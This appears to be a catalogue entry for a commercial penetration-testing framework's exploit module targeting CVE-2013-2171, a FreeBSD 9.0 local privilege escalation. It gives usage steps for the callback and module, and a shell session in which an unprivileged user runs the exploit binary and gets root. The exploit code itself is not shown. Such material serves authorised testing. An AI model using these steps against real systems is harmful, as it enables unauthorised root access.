Name | maptrace |
---|---|
CVE | CVE-2013-2171 Exploit Pack |
VENDOR: Intel,FreeBSD | |
Notes: | |
Tested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64 |
To test this exploit from CANVAS use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386
callback binary to establish a BSD node on a universal CANVAS listener. Then run the maptrace
module against this node to elevate your privileges on the node. This should work on FreeBSD
9.0-RELEASE* amd64 on 64bit Intel processors. Note this will not spawn a new node, but rather
keep the existing node connection with elevated privileges.
Alternatively you can use the Resources/x binary outside of the framework.
$ uname -a
FreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(immunity) gid=1001(immunity) groups=1001(immunity)
$ ./x
[] FeeBSD amd64 local r00t - MMAP/PTRACE []
uid=0(root) gid=0(wheel) groups=0(wheel)
Repeatability: Infinite
References: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2171